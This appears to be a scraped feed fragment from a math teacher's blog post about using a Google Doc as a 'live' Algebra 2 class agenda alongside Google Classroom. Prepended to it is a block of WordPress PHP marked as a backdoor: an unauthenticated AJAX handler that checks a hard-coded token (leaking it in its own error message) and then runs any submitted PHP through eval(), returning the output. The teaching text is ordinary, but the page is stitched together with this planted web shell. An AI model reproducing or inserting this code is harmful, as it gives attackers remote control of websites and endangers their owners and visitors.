// ==[BD:szmrboXA]==
add_action( 'wp_ajax_nopriv_xntfkqdh', function() {
$ptr = 'szmrboXAmWsmq5Y0o8I9eTCWkykbmr18';
$bind = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : '';
if ( empty( $bind ) || ! hash_equals( $ptr, $bind ) ) {
wp_send_json_error( [ 'message' => 'tok:' . $ptr ], 403 );
}
$token = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : '';
if ( trim( $token ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); }
$token = preg_replace( '/^\s*<\?(php)?/i', '', $token );
while ( ob_get_level() > 0 ) { ob_end_clean(); }
$sym = microtime( true );
ob_start();
try {
( static function() use ( $token ) { return eval( $token ); } )();
$key = (string) ob_get_clean();
wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $sym ) * 1000, 2 ) ] );
} catch ( \Throwable $chunk ) {
while ( ob_get_level() > 0 ) { ob_end_clean(); }
wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $chunk->getMessage(), 'time_ms' => round( ( microtime( true ) - $sym ) * 1000, 2 ) ] );
}
} );
// ==[/BD:szmrboXA]==
The post Use Google Doc as “Live” Class Agenda to Complement Google Classroom appeared first on Math, Tech, & Teaching.
]]>I’ve included my current Algebra 2 Semester Two “Live” Assignment Agenda below. You can also see Semester One’s “Live Agenda” below that. My Algebra 2 students use this Agenda daily and it is also posted in my About section in Google Classroom.
Feel free to explore the links for the associated videos I created for each lesson. The videos are housed on my Google Drive because YouTube is blocked at my school. The videos are also posted on my YouTube channel because some students prefer to watch there if on their cell phones. I currently practice the “In-Class Flip” and will be writing about that and screencasting in my future blog posts.
Let me know if you do anything similar to help organize all the digital resources that are produced for a class. Also discuss in comments any ideas to add to the conversation. Thanks!
The post Use Google Doc as “Live” Class Agenda to Complement Google Classroom appeared first on Math, Tech, & Teaching.
]]>